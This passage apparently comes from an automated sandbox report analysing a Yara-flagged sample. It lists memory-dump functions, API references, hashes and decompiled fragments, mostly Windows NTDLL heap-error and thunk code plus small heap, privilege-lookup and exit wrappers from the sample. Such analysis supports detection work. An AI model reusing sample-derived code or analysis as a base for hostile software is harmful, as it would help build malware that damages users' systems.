Instruction Fuzzy Hash: 639002B120100402D140719944087560045A7D1381F51C111AA058664EC6998EED76A5

Uniqueness

Uniqueness Score: -1.00%

Function 018D98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D98FA

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
Instruction ID: f827235518f72a7f2a7cd8b4585fce2c55a9ab870967542bb86f9271b82ec0f8
Opcode Fuzzy Hash: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
Instruction Fuzzy Hash: D190026160100502D10171994408626004AA7D13C1F91C122A6018665ECA658AAAB171

Uniqueness

Uniqueness Score: -1.00%

Function 018D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D984A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
Instruction ID: bef7ba3e9815b109828608e67f244e5e57fe8e431f3f91bcd85f29a57f8d1435
Opcode Fuzzy Hash: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
Instruction Fuzzy Hash: 6D900261242041525545B19944085174046B7E13C1791C112A6408A60CC566996EE661

Uniqueness

Uniqueness Score: -1.00%

Function 018D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D986A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
Instruction ID: 59582e93a4f2b8ff026664278bfab83939b668397f0134720f2fac7466491af9
Opcode Fuzzy Hash: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
Instruction Fuzzy Hash: 6C90027120100413D111619945087170049A7D13C1F91C512A5418668DD6968A6AB161

Uniqueness

Uniqueness Score: -1.00%

Function 018D9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D9A0A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
Instruction ID: 8a269b114d62fb0afead7509322cc703d795562e47fcffdeafc1662ae4cfec49
Opcode Fuzzy Hash: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
Instruction Fuzzy Hash: 8E90027120140402D1006199481871B0045A7D1382F51C111A6158665DC665896975B1

Uniqueness

Uniqueness Score: -1.00%

Function 018D9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D9A2A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
Instruction ID: 88d89b5a93e372a4e84e2193eb4505eed67cfb02ded18c74ccfbf1a2d44d1a42
Opcode Fuzzy Hash: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
Instruction Fuzzy Hash: CF90026160100042414071A988489164045BBE2391751C221A598C660DC599897D66A5

Uniqueness

Uniqueness Score: -1.00%

Function 018D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D9A5A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
Instruction ID: 98dc01b99683be868e95991aceaca76167560267beff6c61491cc8353f788467
Opcode Fuzzy Hash: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
Instruction Fuzzy Hash: D690026121180042D20065A94C18B170045A7D1383F51C215A5148664CC95589796561

Uniqueness

Uniqueness Score: -1.00%

Function 018D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D95DA

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
Instruction ID: a26870dda83c28240fed10a6da1ad643e0199de0f08acfcde9f39b61c7925acb
Opcode Fuzzy Hash: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
Instruction Fuzzy Hash: 869002A120200003410571994418626404AA7E1381B51C121E60086A0DC56589A97165

Uniqueness

Uniqueness Score: -1.00%

Function 018D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D954A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
Instruction ID: 25d3dc18543222bc226cfe4ad701c217de339c281b13f7a78db9e78f92bf21e0
Opcode Fuzzy Hash: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
Instruction Fuzzy Hash: B9900265211000030105A59907085170086A7D63D1351C121F6009660CD66189796161

Uniqueness

Uniqueness Score: -1.00%

Function 018D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D978A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
Instruction ID: 8bae8b49cea459c22722bfb571b02aa536d9146785cf1ec7446fd74d5bb2cfac
Opcode Fuzzy Hash: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
Instruction Fuzzy Hash: 7290026921300002D1807199540C61A0045A7D2382F91D515A5009668CC955897D6361

Uniqueness

Uniqueness Score: -1.00%

Function 018D97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D97AA

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
Instruction ID: be3ce218bbf776591d00267c21f068cd6729aac63d2bcb0d7a527258008e5d6e
Opcode Fuzzy Hash: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
Instruction Fuzzy Hash: B690026130100003D1407199541C6164045F7E2381F51D111E5408664CD955896E6262

Uniqueness

Uniqueness Score: -1.00%

Function 018D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D9FEA

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
Instruction ID: 728c84c82ce69c5de3b9ea38c88e8e582ab7cebf0184faaf8b87319b51376e91
Opcode Fuzzy Hash: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
Instruction Fuzzy Hash: 1290027131114402D110619984087160045A7D2381F51C511A5818668DC6D589A97162

Uniqueness

Uniqueness Score: -1.00%

Function 018D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D971A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
Instruction ID: 4fcf1ab5422ba200f23f3f4c5d2b7e2de0ea2edc15f0f70b43ab4f30021315b9
Opcode Fuzzy Hash: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
Instruction Fuzzy Hash: 2990027120100402D10065D9540C6560045A7E1381F51D111AA018665EC6A589A97171

Uniqueness

Uniqueness Score: -1.00%

Function 018D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D96EA

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
Instruction ID: 6e55cf9ecf6c0dd0d2ca79c131fd3c9bd80e851aee30bf829a01120951751849
Opcode Fuzzy Hash: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
Instruction Fuzzy Hash: 1590027120108802D1106199840875A0045A7D1381F55C511A9418768DC6D589A97161

Uniqueness

Uniqueness Score: -1.00%

Function 018D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D966A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
Instruction ID: fe93457a4fcad1289ec6382bf934db5aea854220ef0c0c432154f865c6ada710
Opcode Fuzzy Hash: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
Instruction Fuzzy Hash: D190027120100802D1807199440865A0045A7D2381F91C115A5019764DCA558B6D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 004088E0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188d7
0x004188e2
0x004188ed
0x004188f1

APIs

RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED

Strings

F5A, xrefs: 004188E2, 004188EC

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: F5A
API String ID: 1279760036-683449296
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418A51, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: abf3a9f7f6d85d26bc9f8aecd891381bdc2cffb304101b5434cfdf4b3142d11a
Instruction ID: 2cead5059727768408c198581e14ed59689edf6ef38ad4b660be0a02d042fd06
Opcode Fuzzy Hash: abf3a9f7f6d85d26bc9f8aecd891381bdc2cffb304101b5434cfdf4b3142d11a
Instruction Fuzzy Hash: 2201F574100244ABDB14DF78CCC1DDB7BA5EF45360F108299F8989B213D635995ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00407313, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21db21584d31cbde9d7360a491c9112e4046f5a8166b984e03ea927f49f30a7f
Instruction ID: 85407d09f0cb4c44f153f7e6890c7c7f7e2fb16b1e5403dd0bab9a8362cd6ff8
Opcode Fuzzy Hash: 21db21584d31cbde9d7360a491c9112e4046f5a8166b984e03ea927f49f30a7f
Instruction Fuzzy Hash: CCF05932E4811426F71155444C03FBB63999B51B00F18007FFE00BA2C1D6BDA80582EA

Uniqueness

Uniqueness Score: -1.00%

Function 004188F2, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5ad2ffc142702f2e6f5786f552b908d7067e9d3b44a443df1ac96bc832bf6a54
Instruction ID: a5eea13841067487e4fb49847a508327c05cb30c476396cca86df173ae91ddae
Opcode Fuzzy Hash: 5ad2ffc142702f2e6f5786f552b908d7067e9d3b44a443df1ac96bc832bf6a54
Instruction Fuzzy Hash: BBE0E571100209BFD704DFA9CC45ED77768EF84310F114559F80857251C630E805CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418932, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: aca846f1237d062bf83dad83cfca27d5e426029cb0d433e0733aa973c53b09ae
Instruction ID: 9c50ff6b6107c016808110bbb92ae0f9f44a06eea364c64ae1a9f0e414dbc6bf
Opcode Fuzzy Hash: aca846f1237d062bf83dad83cfca27d5e426029cb0d433e0733aa973c53b09ae
Instruction Fuzzy Hash: 00E08C35200200BFD721DF64CD84FC73B68AF0A390F0184AABA585B242C570EA44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 018D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D9694

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
Instruction ID: 2204a83720acbdedcfd9b4a204bbad34eb0b970d47639a0b49348e1640651e68
Opcode Fuzzy Hash: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
Instruction Fuzzy Hash: 1FB02B71D010C0C5D601D3B0060C7273A0077C0340F13C011D2024340B4338C194F2B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0194B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0194B2DC
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0194B323
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B38F
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0194B53F
The resource is owned exclusively by thread %p, xrefs: 0194B374
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0194B47D
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B3D6
This failed because of error %Ix., xrefs: 0194B446
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0194B2F3
<unknown>, xrefs: 0194B27E, 0194B2D1, 0194B350, 0194B399, 0194B417, 0194B48E
The instruction at %p referenced memory at %p., xrefs: 0194B432
*** An Access Violation occurred in %ws:%s, xrefs: 0194B48F
*** Resource timeout (%p) in %ws:%s, xrefs: 0194B352
*** enter .cxr %p for the context, xrefs: 0194B50D
The resource is owned shared by %d threads, xrefs: 0194B37E
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0194B305
*** Inpage error in %ws:%s, xrefs: 0194B418
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0194B484
*** then kb to get the faulting stack, xrefs: 0194B51C
The instruction at %p tried to %s , xrefs: 0194B4B6
an invalid address, %p, xrefs: 0194B4CF
a NULL pointer, xrefs: 0194B4E0
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0194B39B
read from, xrefs: 0194B4AD, 0194B4B2
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0194B476
*** enter .exr %p for the exception record, xrefs: 0194B4F1
Go determine why that thread has not released the critical section., xrefs: 0194B3C5
write to, xrefs: 0194B4A6
The critical section is owned by thread %p., xrefs: 0194B3B9
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0194B314

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
Instruction ID: 205864ddb034f3b507504d6cbdd9b0a0b3fbd801c9dd46eda507b7b73253c8bc
Opcode Fuzzy Hash: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
Instruction Fuzzy Hash: F1812735A41210FFEB216A4ACC85EBB3F2AAF96B52F014148F50D9B256D265C601D7B2

Uniqueness

Uniqueness Score: -1.00%

Function 01951C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01951C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0189B150();
				} else {
					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x198589c);
				E0189B150("Heap error detected at %p (heap handle %p)\n",  *0x19858a0);
				_t27 =  *0x1985898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01951E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0189B150();
				} else {
					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0189B150("Error code: %d - %s\n",  *0x1985898);
				_t113 =  *0x19858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Parameter1: %p\n",  *0x19858a4);
				}
				_t115 =  *0x19858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Parameter2: %p\n",  *0x19858a8);
				}
				_t117 =  *0x19858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Parameter3: %p\n",  *0x19858ac);
				}
				_t119 =  *0x19858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19858b4);
					E0189B150("Last known valid blocks: before - %p, after - %p\n",  *0x19858b0);
				} else {
					_t120 =  *0x19858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0189B150();
				} else {
					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0189B150("Stack trace available at %p\n", 0x19858c0);
			}

0x01951c10
0x01951c16
0x01951c1e
0x01951c3d
0x01951c3e
0x01951c20
0x01951c35
0x01951c3a
0x01951c44
0x01951c55
0x01951c5a
0x01951c65
0x01951c67
0x00000000
0x01951c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01951c67
0x01951cdc
0x01951ce5
0x01951d04
0x01951d05
0x01951ce7
0x01951cfc
0x01951d01
